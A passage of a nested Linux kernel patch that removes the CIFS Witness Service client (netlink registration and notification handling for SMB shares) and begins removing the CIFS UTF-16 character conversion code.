+-
+-	if (tcon->ses->user_name != NULL) {
+-		ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_USER_NAME, tcon->ses->user_name);
+-		if (ret < 0)
+-			return ret;
+-	}
+-
+-	if (tcon->ses->password != NULL) {
+-		ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_PASSWORD, tcon->ses->password);
+-		if (ret < 0)
+-			return ret;
+-	}
+-
+-	if (tcon->ses->domainName != NULL) {
+-		ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_DOMAIN_NAME, tcon->ses->domainName);
+-		if (ret < 0)
+-			return ret;
+-	}
+-
+-	return 0;
+-}
+-
+-/*
+- * Sends a register message to the userspace daemon based on the registration.
+- * The authentication information to connect to the witness service is bundled
+- * into the message.
+- */
+-static int cifs_swn_send_register_message(struct cifs_swn_reg *swnreg)
+-{
+-	struct sk_buff *skb;
+-	struct genlmsghdr *hdr;
+-	enum securityEnum authtype;
+-	struct sockaddr_storage *addr;
+-	int ret;
+-
+-	skb = genlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (skb == NULL) {
+-		ret = -ENOMEM;
+-		goto fail;
+-	}
+-
+-	hdr = genlmsg_put(skb, 0, 0, &cifs_genl_family, 0, CIFS_GENL_CMD_SWN_REGISTER);
+-	if (hdr == NULL) {
+-		ret = -ENOMEM;
+-		goto nlmsg_fail;
+-	}
+-
+-	ret = nla_put_u32(skb, CIFS_GENL_ATTR_SWN_REGISTRATION_ID, swnreg->id);
+-	if (ret < 0)
+-		goto nlmsg_fail;
+-
+-	ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_NET_NAME, swnreg->net_name);
+-	if (ret < 0)
+-		goto nlmsg_fail;
+-
+-	ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_SHARE_NAME, swnreg->share_name);
+-	if (ret < 0)
+-		goto nlmsg_fail;
+-
+-	/*
+-	 * If there is an address stored use it instead of the server address, because we are
+-	 * in the process of reconnecting to it after a share has been moved or we have been
+-	 * told to switch to it (client move message). In these cases we unregister from the
+-	 * server address and register to the new address when we receive the notification.
+-	 */
+-	if (swnreg->tcon->ses->server->use_swn_dstaddr)
+-		addr = &swnreg->tcon->ses->server->swn_dstaddr;
+-	else
+-		addr = &swnreg->tcon->ses->server->dstaddr;
+-
+-	ret = nla_put(skb, CIFS_GENL_ATTR_SWN_IP, sizeof(struct sockaddr_storage), addr);
+-	if (ret < 0)
+-		goto nlmsg_fail;
+-
+-	if (swnreg->net_name_notify) {
+-		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_NET_NAME_NOTIFY);
+-		if (ret < 0)
+-			goto nlmsg_fail;
+-	}
+-
+-	if (swnreg->share_name_notify) {
+-		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_SHARE_NAME_NOTIFY);
+-		if (ret < 0)
+-			goto nlmsg_fail;
+-	}
+-
+-	if (swnreg->ip_notify) {
+-		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_IP_NOTIFY);
+-		if (ret < 0)
+-			goto nlmsg_fail;
+-	}
+-
+-	authtype = cifs_select_sectype(swnreg->tcon->ses->server, swnreg->tcon->ses->sectype);
+-	switch (authtype) {
+-	case Kerberos:
+-		ret = cifs_swn_auth_info_krb(swnreg->tcon, skb);
+-		if (ret < 0) {
+-			cifs_dbg(VFS, "%s: Failed to get kerberos auth info: %d\n", __func__, ret);
+-			goto nlmsg_fail;
+-		}
+-		break;
+-	case NTLMv2:
+-	case RawNTLMSSP:
+-		ret = cifs_swn_auth_info_ntlm(swnreg->tcon, skb);
+-		if (ret < 0) {
+-			cifs_dbg(VFS, "%s: Failed to get NTLM auth info: %d\n", __func__, ret);
+-			goto nlmsg_fail;
+-		}
+-		break;
+-	default:
+-		cifs_dbg(VFS, "%s: secType %d not supported!\n", __func__, authtype);
+-		ret = -EINVAL;
+-		goto nlmsg_fail;
+-	}
+-
+-	genlmsg_end(skb, hdr);
+-	genlmsg_multicast(&cifs_genl_family, skb, 0, CIFS_GENL_MCGRP_SWN, GFP_ATOMIC);
+-
+-	cifs_dbg(FYI, "%s: Message to register for network name %s with id %d sent\n", __func__,
+-			swnreg->net_name, swnreg->id);
+-
+-	return 0;
+-
+-nlmsg_fail:
+-	genlmsg_cancel(skb, hdr);
+-	nlmsg_free(skb);
+-fail:
+-	return ret;
+-}
+-
+-/*
+- * Sends an uregister message to the userspace daemon based on the registration
+- */
+-static int cifs_swn_send_unregister_message(struct cifs_swn_reg *swnreg)
+-{
+-	struct sk_buff *skb;
+-	struct genlmsghdr *hdr;
+-	int ret;
+-
+-	skb = genlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (skb == NULL)
+-		return -ENOMEM;
+-
+-	hdr = genlmsg_put(skb, 0, 0, &cifs_genl_family, 0, CIFS_GENL_CMD_SWN_UNREGISTER);
+-	if (hdr == NULL) {
+-		ret = -ENOMEM;
+-		goto nlmsg_fail;
+-	}
+-
+-	ret = nla_put_u32(skb, CIFS_GENL_ATTR_SWN_REGISTRATION_ID, swnreg->id);
+-	if (ret < 0)
+-		goto nlmsg_fail;
+-
+-	ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_NET_NAME, swnreg->net_name);
+-	if (ret < 0)
+-		goto nlmsg_fail;
+-
+-	ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_SHARE_NAME, swnreg->share_name);
+-	if (ret < 0)
+-		goto nlmsg_fail;
+-
+-	ret = nla_put(skb, CIFS_GENL_ATTR_SWN_IP, sizeof(struct sockaddr_storage),
+-			&swnreg->tcon->ses->server->dstaddr);
+-	if (ret < 0)
+-		goto nlmsg_fail;
+-
+-	if (swnreg->net_name_notify) {
+-		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_NET_NAME_NOTIFY);
+-		if (ret < 0)
+-			goto nlmsg_fail;
+-	}
+-
+-	if (swnreg->share_name_notify) {
+-		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_SHARE_NAME_NOTIFY);
+-		if (ret < 0)
+-			goto nlmsg_fail;
+-	}
+-
+-	if (swnreg->ip_notify) {
+-		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_IP_NOTIFY);
+-		if (ret < 0)
+-			goto nlmsg_fail;
+-	}
+-
+-	genlmsg_end(skb, hdr);
+-	genlmsg_multicast(&cifs_genl_family, skb, 0, CIFS_GENL_MCGRP_SWN, GFP_ATOMIC);
+-
+-	cifs_dbg(FYI, "%s: Message to unregister for network name %s with id %d sent\n", __func__,
+-			swnreg->net_name, swnreg->id);
+-
+-	return 0;
+-
+-nlmsg_fail:
+-	genlmsg_cancel(skb, hdr);
+-	nlmsg_free(skb);
+-	return ret;
+-}
+-
+-/*
+- * Try to find a matching registration for the tcon's server name and share name.
+- * Calls to this function must be protected by cifs_swnreg_idr_mutex.
+- * TODO Try to avoid memory allocations
+- */
+-static struct cifs_swn_reg *cifs_find_swn_reg(struct cifs_tcon *tcon)
+-{
+-	struct cifs_swn_reg *swnreg;
+-	int id;
+-	const char *share_name;
+-	const char *net_name;
+-
+-	net_name = extract_hostname(tcon->tree_name);
+-	if (IS_ERR(net_name)) {
+-		int ret;
+-
+-		ret = PTR_ERR(net_name);
+-		cifs_dbg(VFS, "%s: failed to extract host name from target '%s': %d\n",
+-				__func__, tcon->tree_name, ret);
+-		return ERR_PTR(-EINVAL);
+-	}
+-
+-	share_name = extract_sharename(tcon->tree_name);
+-	if (IS_ERR(share_name)) {
+-		int ret;
+-
+-		ret = PTR_ERR(share_name);
+-		cifs_dbg(VFS, "%s: failed to extract share name from target '%s': %d\n",
+-				__func__, tcon->tree_name, ret);
+-		kfree(net_name);
+-		return ERR_PTR(-EINVAL);
+-	}
+-
+-	idr_for_each_entry(&cifs_swnreg_idr, swnreg, id) {
+-		if (strcasecmp(swnreg->net_name, net_name) != 0
+-		    || strcasecmp(swnreg->share_name, share_name) != 0) {
+-			continue;
+-		}
+-
+-		cifs_dbg(FYI, "Existing swn registration for %s:%s found\n", swnreg->net_name,
+-				swnreg->share_name);
+-
+-		kfree(net_name);
+-		kfree(share_name);
+-
+-		return swnreg;
+-	}
+-
+-	kfree(net_name);
+-	kfree(share_name);
+-
+-	return ERR_PTR(-EEXIST);
+-}
+-
+-/*
+- * Get a registration for the tcon's server and share name, allocating a new one if it does not
+- * exists
+- */
+-static struct cifs_swn_reg *cifs_get_swn_reg(struct cifs_tcon *tcon)
+-{
+-	struct cifs_swn_reg *reg = NULL;
+-	int ret;
+-
+-	mutex_lock(&cifs_swnreg_idr_mutex);
+-
+-	/* Check if we are already registered for this network and share names */
+-	reg = cifs_find_swn_reg(tcon);
+-	if (!IS_ERR(reg)) {
+-		kref_get(&reg->ref_count);
+-		mutex_unlock(&cifs_swnreg_idr_mutex);
+-		return reg;
+-	} else if (PTR_ERR(reg) != -EEXIST) {
+-		mutex_unlock(&cifs_swnreg_idr_mutex);
+-		return reg;
+-	}
+-
+-	reg = kmalloc(sizeof(struct cifs_swn_reg), GFP_ATOMIC);
+-	if (reg == NULL) {
+-		mutex_unlock(&cifs_swnreg_idr_mutex);
+-		return ERR_PTR(-ENOMEM);
+-	}
+-
+-	kref_init(&reg->ref_count);
+-
+-	reg->id = idr_alloc(&cifs_swnreg_idr, reg, 1, 0, GFP_ATOMIC);
+-	if (reg->id < 0) {
+-		cifs_dbg(FYI, "%s: failed to allocate registration id\n", __func__);
+-		ret = reg->id;
+-		goto fail;
+-	}
+-
+-	reg->net_name = extract_hostname(tcon->tree_name);
+-	if (IS_ERR(reg->net_name)) {
+-		ret = PTR_ERR(reg->net_name);
+-		cifs_dbg(VFS, "%s: failed to extract host name from target: %d\n", __func__, ret);
+-		goto fail_idr;
+-	}
+-
+-	reg->share_name = extract_sharename(tcon->tree_name);
+-	if (IS_ERR(reg->share_name)) {
+-		ret = PTR_ERR(reg->share_name);
+-		cifs_dbg(VFS, "%s: failed to extract share name from target: %d\n", __func__, ret);
+-		goto fail_net_name;
+-	}
+-
+-	reg->net_name_notify = true;
+-	reg->share_name_notify = true;
+-	reg->ip_notify = (tcon->capabilities & SMB2_SHARE_CAP_SCALEOUT);
+-
+-	reg->tcon = tcon;
+-
+-	mutex_unlock(&cifs_swnreg_idr_mutex);
+-
+-	return reg;
+-
+-fail_net_name:
+-	kfree(reg->net_name);
+-fail_idr:
+-	idr_remove(&cifs_swnreg_idr, reg->id);
+-fail:
+-	kfree(reg);
+-	mutex_unlock(&cifs_swnreg_idr_mutex);
+-	return ERR_PTR(ret);
+-}
+-
+-static void cifs_swn_reg_release(struct kref *ref)
+-{
+-	struct cifs_swn_reg *swnreg = container_of(ref, struct cifs_swn_reg, ref_count);
+-	int ret;
+-
+-	ret = cifs_swn_send_unregister_message(swnreg);
+-	if (ret < 0)
+-		cifs_dbg(VFS, "%s: Failed to send unregister message: %d\n", __func__, ret);
+-
+-	idr_remove(&cifs_swnreg_idr, swnreg->id);
+-	kfree(swnreg->net_name);
+-	kfree(swnreg->share_name);
+-	kfree(swnreg);
+-}
+-
+-static void cifs_put_swn_reg(struct cifs_swn_reg *swnreg)
+-{
+-	mutex_lock(&cifs_swnreg_idr_mutex);
+-	kref_put(&swnreg->ref_count, cifs_swn_reg_release);
+-	mutex_unlock(&cifs_swnreg_idr_mutex);
+-}
+-
+-static int cifs_swn_resource_state_changed(struct cifs_swn_reg *swnreg, const char *name, int state)
+-{
+-	switch (state) {
+-	case CIFS_SWN_RESOURCE_STATE_UNAVAILABLE:
+-		cifs_dbg(FYI, "%s: resource name '%s' become unavailable\n", __func__, name);
+-		cifs_signal_cifsd_for_reconnect(swnreg->tcon->ses->server, true);
+-		break;
+-	case CIFS_SWN_RESOURCE_STATE_AVAILABLE:
+-		cifs_dbg(FYI, "%s: resource name '%s' become available\n", __func__, name);
+-		cifs_signal_cifsd_for_reconnect(swnreg->tcon->ses->server, true);
+-		break;
+-	case CIFS_SWN_RESOURCE_STATE_UNKNOWN:
+-		cifs_dbg(FYI, "%s: resource name '%s' changed to unknown state\n", __func__, name);
+-		break;
+-	}
+-	return 0;
+-}
+-
+-static bool cifs_sockaddr_equal(struct sockaddr_storage *addr1, struct sockaddr_storage *addr2)
+-{
+-	if (addr1->ss_family != addr2->ss_family)
+-		return false;
+-
+-	if (addr1->ss_family == AF_INET) {
+-		return (memcmp(&((const struct sockaddr_in *)addr1)->sin_addr,
+-				&((const struct sockaddr_in *)addr2)->sin_addr,
+-				sizeof(struct in_addr)) == 0);
+-	}
+-
+-	if (addr1->ss_family == AF_INET6) {
+-		return (memcmp(&((const struct sockaddr_in6 *)addr1)->sin6_addr,
+-				&((const struct sockaddr_in6 *)addr2)->sin6_addr,
+-				sizeof(struct in6_addr)) == 0);
+-	}
+-
+-	return false;
+-}
+-
+-static int cifs_swn_store_swn_addr(const struct sockaddr_storage *new,
+-				   const struct sockaddr_storage *old,
+-				   struct sockaddr_storage *dst)
+-{
+-	__be16 port = cpu_to_be16(CIFS_PORT);
+-
+-	if (old->ss_family == AF_INET) {
+-		struct sockaddr_in *ipv4 = (struct sockaddr_in *)old;
+-
+-		port = ipv4->sin_port;
+-	} else if (old->ss_family == AF_INET6) {
+-		struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)old;
+-
+-		port = ipv6->sin6_port;
+-	}
+-
+-	if (new->ss_family == AF_INET) {
+-		struct sockaddr_in *ipv4 = (struct sockaddr_in *)new;
+-
+-		ipv4->sin_port = port;
+-	} else if (new->ss_family == AF_INET6) {
+-		struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)new;
+-
+-		ipv6->sin6_port = port;
+-	}
+-
+-	*dst = *new;
+-
+-	return 0;
+-}
+-
+-static int cifs_swn_reconnect(struct cifs_tcon *tcon, struct sockaddr_storage *addr)
+-{
+-	int ret = 0;
+-
+-	/* Store the reconnect address */
+-	cifs_server_lock(tcon->ses->server);
+-	if (cifs_sockaddr_equal(&tcon->ses->server->dstaddr, addr))
+-		goto unlock;
+-
+-	ret = cifs_swn_store_swn_addr(addr, &tcon->ses->server->dstaddr,
+-				      &tcon->ses->server->swn_dstaddr);
+-	if (ret < 0) {
+-		cifs_dbg(VFS, "%s: failed to store address: %d\n", __func__, ret);
+-		goto unlock;
+-	}
+-	tcon->ses->server->use_swn_dstaddr = true;
+-
+-	/*
+-	 * Unregister to stop receiving notifications for the old IP address.
+-	 */
+-	ret = cifs_swn_unregister(tcon);
+-	if (ret < 0) {
+-		cifs_dbg(VFS, "%s: Failed to unregister for witness notifications: %d\n",
+-			 __func__, ret);
+-		goto unlock;
+-	}
+-
+-	/*
+-	 * And register to receive notifications for the new IP address now that we have
+-	 * stored the new address.
+-	 */
+-	ret = cifs_swn_register(tcon);
+-	if (ret < 0) {
+-		cifs_dbg(VFS, "%s: Failed to register for witness notifications: %d\n",
+-			 __func__, ret);
+-		goto unlock;
+-	}
+-
+-	cifs_signal_cifsd_for_reconnect(tcon->ses->server, false);
+-
+-unlock:
+-	cifs_server_unlock(tcon->ses->server);
+-
+-	return ret;
+-}
+-
+-static int cifs_swn_client_move(struct cifs_swn_reg *swnreg, struct sockaddr_storage *addr)
+-{
+-	struct sockaddr_in *ipv4 = (struct sockaddr_in *)addr;
+-	struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)addr;
+-
+-	if (addr->ss_family == AF_INET)
+-		cifs_dbg(FYI, "%s: move to %pI4\n", __func__, &ipv4->sin_addr);
+-	else if (addr->ss_family == AF_INET6)
+-		cifs_dbg(FYI, "%s: move to %pI6\n", __func__, &ipv6->sin6_addr);
+-
+-	return cifs_swn_reconnect(swnreg->tcon, addr);
+-}
+-
+-int cifs_swn_notify(struct sk_buff *skb, struct genl_info *info)
+-{
+-	struct cifs_swn_reg *swnreg;
+-	char name[256];
+-	int type;
+-
+-	if (info->attrs[CIFS_GENL_ATTR_SWN_REGISTRATION_ID]) {
+-		int swnreg_id;
+-
+-		swnreg_id = nla_get_u32(info->attrs[CIFS_GENL_ATTR_SWN_REGISTRATION_ID]);
+-		mutex_lock(&cifs_swnreg_idr_mutex);
+-		swnreg = idr_find(&cifs_swnreg_idr, swnreg_id);
+-		mutex_unlock(&cifs_swnreg_idr_mutex);
+-		if (swnreg == NULL) {
+-			cifs_dbg(FYI, "%s: registration id %d not found\n", __func__, swnreg_id);
+-			return -EINVAL;
+-		}
+-	} else {
+-		cifs_dbg(FYI, "%s: missing registration id attribute\n", __func__);
+-		return -EINVAL;
+-	}
+-
+-	if (info->attrs[CIFS_GENL_ATTR_SWN_NOTIFICATION_TYPE]) {
+-		type = nla_get_u32(info->attrs[CIFS_GENL_ATTR_SWN_NOTIFICATION_TYPE]);
+-	} else {
+-		cifs_dbg(FYI, "%s: missing notification type attribute\n", __func__);
+-		return -EINVAL;
+-	}
+-
+-	switch (type) {
+-	case CIFS_SWN_NOTIFICATION_RESOURCE_CHANGE: {
+-		int state;
+-
+-		if (info->attrs[CIFS_GENL_ATTR_SWN_RESOURCE_NAME]) {
+-			nla_strscpy(name, info->attrs[CIFS_GENL_ATTR_SWN_RESOURCE_NAME],
+-					sizeof(name));
+-		} else {
+-			cifs_dbg(FYI, "%s: missing resource name attribute\n", __func__);
+-			return -EINVAL;
+-		}
+-		if (info->attrs[CIFS_GENL_ATTR_SWN_RESOURCE_STATE]) {
+-			state = nla_get_u32(info->attrs[CIFS_GENL_ATTR_SWN_RESOURCE_STATE]);
+-		} else {
+-			cifs_dbg(FYI, "%s: missing resource state attribute\n", __func__);
+-			return -EINVAL;
+-		}
+-		return cifs_swn_resource_state_changed(swnreg, name, state);
+-	}
+-	case CIFS_SWN_NOTIFICATION_CLIENT_MOVE: {
+-		struct sockaddr_storage addr;
+-
+-		if (info->attrs[CIFS_GENL_ATTR_SWN_IP]) {
+-			nla_memcpy(&addr, info->attrs[CIFS_GENL_ATTR_SWN_IP], sizeof(addr));
+-		} else {
+-			cifs_dbg(FYI, "%s: missing IP address attribute\n", __func__);
+-			return -EINVAL;
+-		}
+-		return cifs_swn_client_move(swnreg, &addr);
+-	}
+-	default:
+-		cifs_dbg(FYI, "%s: unknown notification type %d\n", __func__, type);
+-		break;
+-	}
+-
+-	return 0;
+-}
+-
+-int cifs_swn_register(struct cifs_tcon *tcon)
+-{
+-	struct cifs_swn_reg *swnreg;
+-	int ret;
+-
+-	swnreg = cifs_get_swn_reg(tcon);
+-	if (IS_ERR(swnreg))
+-		return PTR_ERR(swnreg);
+-
+-	ret = cifs_swn_send_register_message(swnreg);
+-	if (ret < 0) {
+-		cifs_dbg(VFS, "%s: Failed to send swn register message: %d\n", __func__, ret);
+-		/* Do not put the swnreg or return error, the echo task will retry */
+-	}
+-
+-	return 0;
+-}
+-
+-int cifs_swn_unregister(struct cifs_tcon *tcon)
+-{
+-	struct cifs_swn_reg *swnreg;
+-
+-	mutex_lock(&cifs_swnreg_idr_mutex);
+-
+-	swnreg = cifs_find_swn_reg(tcon);
+-	if (IS_ERR(swnreg)) {
+-		mutex_unlock(&cifs_swnreg_idr_mutex);
+-		return PTR_ERR(swnreg);
+-	}
+-
+-	mutex_unlock(&cifs_swnreg_idr_mutex);
+-
+-	cifs_put_swn_reg(swnreg);
+-
+-	return 0;
+-}
+-
+-void cifs_swn_dump(struct seq_file *m)
+-{
+-	struct cifs_swn_reg *swnreg;
+-	struct sockaddr_in *sa;
+-	struct sockaddr_in6 *sa6;
+-	int id;
+-
+-	seq_puts(m, "Witness registrations:");
+-
+-	mutex_lock(&cifs_swnreg_idr_mutex);
+-	idr_for_each_entry(&cifs_swnreg_idr, swnreg, id) {
+-		seq_printf(m, "\nId: %u Refs: %u Network name: '%s'%s Share name: '%s'%s Ip address: ",
+-				id, kref_read(&swnreg->ref_count),
+-				swnreg->net_name, swnreg->net_name_notify ? "(y)" : "(n)",
+-				swnreg->share_name, swnreg->share_name_notify ? "(y)" : "(n)");
+-		switch (swnreg->tcon->ses->server->dstaddr.ss_family) {
+-		case AF_INET:
+-			sa = (struct sockaddr_in *) &swnreg->tcon->ses->server->dstaddr;
+-			seq_printf(m, "%pI4", &sa->sin_addr.s_addr);
+-			break;
+-		case AF_INET6:
+-			sa6 = (struct sockaddr_in6 *) &swnreg->tcon->ses->server->dstaddr;
+-			seq_printf(m, "%pI6", &sa6->sin6_addr.s6_addr);
+-			if (sa6->sin6_scope_id)
+-				seq_printf(m, "%%%u", sa6->sin6_scope_id);
+-			break;
+-		default:
+-			seq_puts(m, "(unknown)");
+-		}
+-		seq_printf(m, "%s", swnreg->ip_notify ? "(y)" : "(n)");
+-	}
+-	mutex_unlock(&cifs_swnreg_idr_mutex);
+-	seq_puts(m, "\n");
+-}
+-
+-void cifs_swn_check(void)
+-{
+-	struct cifs_swn_reg *swnreg;
+-	int id;
+-	int ret;
+-
+-	mutex_lock(&cifs_swnreg_idr_mutex);
+-	idr_for_each_entry(&cifs_swnreg_idr, swnreg, id) {
+-		ret = cifs_swn_send_register_message(swnreg);
+-		if (ret < 0)
+-			cifs_dbg(FYI, "%s: Failed to send register message: %d\n", __func__, ret);
+-	}
+-	mutex_unlock(&cifs_swnreg_idr_mutex);
+-}
+diff --git a/fs/cifs/cifs_swn.h b/fs/cifs/cifs_swn.h
+deleted file mode 100644
+index 8a9d2a5c9077e..0000000000000
+--- a/fs/cifs/cifs_swn.h
++++ /dev/null
+@@ -1,52 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * Witness Service client for CIFS
+- *
+- * Copyright (c) 2020 Samuel Cabrero <scabrero@suse.de>
+- */
+-
+-#ifndef _CIFS_SWN_H
+-#define _CIFS_SWN_H
+-#include "cifsglob.h"
+-
+-struct cifs_tcon;
+-struct sk_buff;
+-struct genl_info;
+-
+-#ifdef CONFIG_CIFS_SWN_UPCALL
+-extern int cifs_swn_register(struct cifs_tcon *tcon);
+-
+-extern int cifs_swn_unregister(struct cifs_tcon *tcon);
+-
+-extern int cifs_swn_notify(struct sk_buff *skb, struct genl_info *info);
+-
+-extern void cifs_swn_dump(struct seq_file *m);
+-
+-extern void cifs_swn_check(void);
+-
+-static inline bool cifs_swn_set_server_dstaddr(struct TCP_Server_Info *server)
+-{
+-	if (server->use_swn_dstaddr) {
+-		server->dstaddr = server->swn_dstaddr;
+-		return true;
+-	}
+-	return false;
+-}
+-
+-static inline void cifs_swn_reset_server_dstaddr(struct TCP_Server_Info *server)
+-{
+-	server->use_swn_dstaddr = false;
+-}
+-
+-#else
+-
+-static inline int cifs_swn_register(struct cifs_tcon *tcon) { return 0; }
+-static inline int cifs_swn_unregister(struct cifs_tcon *tcon) { return 0; }
+-static inline int cifs_swn_notify(struct sk_buff *s, struct genl_info *i) { return 0; }
+-static inline void cifs_swn_dump(struct seq_file *m) {}
+-static inline void cifs_swn_check(void) {}
+-static inline bool cifs_swn_set_server_dstaddr(struct TCP_Server_Info *server) { return false; }
+-static inline void cifs_swn_reset_server_dstaddr(struct TCP_Server_Info *server) {}
+-
+-#endif /* CONFIG_CIFS_SWN_UPCALL */
+-#endif /* _CIFS_SWN_H */
+diff --git a/fs/cifs/cifs_unicode.c b/fs/cifs/cifs_unicode.c
+deleted file mode 100644
+index e7582dd791794..0000000000000
+--- a/fs/cifs/cifs_unicode.c
++++ /dev/null
+@@ -1,632 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2000,2009
+- *   Modified by Steve French (sfrench@us.ibm.com)
+- */
+-#include <linux/fs.h>
+-#include <linux/slab.h>
+-#include "cifs_fs_sb.h"
+-#include "cifs_unicode.h"
+-#include "cifs_uniupr.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifs_debug.h"
+-
+-int cifs_remap(struct cifs_sb_info *cifs_sb)
+-{
+-	int map_type;
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SFM_CHR)
+-		map_type = SFM_MAP_UNI_RSVD;
+-	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SPECIAL_CHR)
+-		map_type = SFU_MAP_UNI_RSVD;
+-	else
+-		map_type = NO_MAP_UNI_RSVD;
+-
+-	return map_type;
+-}
+-
+-/* Convert character using the SFU - "Services for Unix" remapping range */
+-static bool
+-convert_sfu_char(const __u16 src_char, char *target)
+-{
+-	/*
+-	 * BB: Cannot handle remapping UNI_SLASH until all the calls to
+-	 *     build_path_from_dentry are modified, as they use slash as
+-	 *     separator.
+-	 */
+-	switch (src_char) {
+-	case UNI_COLON:
+-		*target = ':';
+-		break;
+-	case UNI_ASTERISK:
+-		*target = '*';
+-		break;
+-	case UNI_QUESTION:
+-		*target = '?';
+-		break;
+-	case UNI_PIPE:
+-		*target = '|';
+-		break;
+-	case UNI_GRTRTHAN:
+-		*target = '>';
+-		break;
+-	case UNI_LESSTHAN:
+-		*target = '<';
+-		break;
+-	default:
+-		return false;
+-	}
+-	return true;
+-}
+-
+-/* Convert character using the SFM - "Services for Mac" remapping range */
+-static bool
+-convert_sfm_char(const __u16 src_char, char *target)
+-{
+-	if (src_char >= 0xF001 && src_char <= 0xF01F) {
+-		*target = src_char - 0xF000;
+-		return true;
+-	}
+-	switch (src_char) {
+-	case SFM_COLON:
+-		*target = ':';
+-		break;
+-	case SFM_DOUBLEQUOTE:
+-		*target = '"';
+-		break;
+-	case SFM_ASTERISK:
+-		*target = '*';
+-		break;
+-	case SFM_QUESTION:
+-		*target = '?';
+-		break;
+-	case SFM_PIPE:
+-		*target = '|';
+-		break;
+-	case SFM_GRTRTHAN:
+-		*target = '>';
+-		break;
+-	case SFM_LESSTHAN:
+-		*target = '<';
+-		break;
+-	case SFM_SPACE:
+-		*target = ' ';
+-		break;
+-	case SFM_PERIOD:
+-		*target = '.';
+-		break;
+-	default:
+-		return false;
+-	}
+-	return true;
+-}
+-
+-
+-/*
+- * cifs_mapchar - convert a host-endian char to proper char in codepage
+- * @target - where converted character should be copied
+- * @src_char - 2 byte host-endian source character
+- * @cp - codepage to which character should be converted
+- * @map_type - How should the 7 NTFS/SMB reserved characters be mapped to UCS2?
+- *
+- * This function handles the conversion of a single character. It is the
+- * responsibility of the caller to ensure that the target buffer is large
+- * enough to hold the result of the conversion (at least NLS_MAX_CHARSET_SIZE).
+- */
+-static int
+-cifs_mapchar(char *target, const __u16 *from, const struct nls_table *cp,
+-	     int maptype)
+-{
+-	int len = 1;
+-	__u16 src_char;
+-
+-	src_char = *from;
+-
+-	if ((maptype == SFM_MAP_UNI_RSVD) && convert_sfm_char(src_char, target))
+-		return len;
+-	else if ((maptype == SFU_MAP_UNI_RSVD) &&
+-		  convert_sfu_char(src_char, target))
+-		return len;
+-
+-	/* if character not one of seven in special remap set */
+-	len = cp->uni2char(src_char, target, NLS_MAX_CHARSET_SIZE);
+-	if (len <= 0)
+-		goto surrogate_pair;
+-
+-	return len;
+-
+-surrogate_pair:
+-	/* convert SURROGATE_PAIR and IVS */
+-	if (strcmp(cp->charset, "utf8"))
+-		goto unknown;
+-	len = utf16s_to_utf8s(from, 3, UTF16_LITTLE_ENDIAN, target, 6);
+-	if (len <= 0)
+-		goto unknown;
+-	return len;
+-
+-unknown:
+-	*target = '?';
+-	len = 1;
+-	return len;
+-}
+-
+-/*
+- * cifs_from_utf16 - convert utf16le string to local charset
+- * @to - destination buffer
+- * @from - source buffer
+- * @tolen - destination buffer size (in bytes)
+- * @fromlen - source buffer size (in bytes)
+- * @codepage - codepage to which characters should be converted
+- * @mapchar - should characters be remapped according to the mapchars option?
+- *
+- * Convert a little-endian utf16le string (as sent by the server) to a string
+- * in the provided codepage. The tolen and fromlen parameters are to ensure
+- * that the code doesn't walk off of the end of the buffer (which is always
+- * a danger if the alignment of the source buffer is off). The destination
+- * string is always properly null terminated and fits in the destination
+- * buffer. Returns the length of the destination string in bytes (including
+- * null terminator).
+- *
+- * Note that some windows versions actually send multiword UTF-16 characters
+- * instead of straight UTF16-2. The linux nls routines however aren't able to
+- * deal with those characters properly. In the event that we get some of
+- * those characters, they won't be translated properly.
+- */
+-int
+-cifs_from_utf16(char *to, const __le16 *from, int tolen, int fromlen,
+-		const struct nls_table *codepage, int map_type)
+-{
+-	int i, charlen, safelen;
+-	int outlen = 0;
+-	int nullsize = nls_nullsize(codepage);
+-	int fromwords = fromlen / 2;
+-	char tmp[NLS_MAX_CHARSET_SIZE];
+-	__u16 ftmp[3];		/* ftmp[3] = 3array x 2bytes = 6bytes UTF-16 */
+-
+-	/*
+-	 * because the chars can be of varying widths, we need to take care
+-	 * not to overflow the destination buffer when we get close to the
+-	 * end of it. Until we get to this offset, we don't need to check
+-	 * for overflow however.
+-	 */
+-	safelen = tolen - (NLS_MAX_CHARSET_SIZE + nullsize);
+-
+-	for (i = 0; i < fromwords; i++) {
+-		ftmp[0] = get_unaligned_le16(&from[i]);
+-		if (ftmp[0] == 0)
+-			break;
+-		if (i + 1 < fromwords)
+-			ftmp[1] = get_unaligned_le16(&from[i + 1]);
+-		else
+-			ftmp[1] = 0;
+-		if (i + 2 < fromwords)
+-			ftmp[2] = get_unaligned_le16(&from[i + 2]);
+-		else
+-			ftmp[2] = 0;
+-
+-		/*
+-		 * check to see if converting this character might make the
+-		 * conversion bleed into the null terminator
+-		 */
+-		if (outlen >= safelen) {
+-			charlen = cifs_mapchar(tmp, ftmp, codepage, map_type);
+-			if ((outlen + charlen) > (tolen - nullsize))
+-				break;
+-		}
+-
+-		/* put converted char into 'to' buffer */
+-		charlen = cifs_mapchar(&to[outlen], ftmp, codepage, map_type);
+-		outlen += charlen;
+-
+-		/* charlen (=bytes of UTF-8 for 1 character)
+-		 * 4bytes UTF-8(surrogate pair) is charlen=4
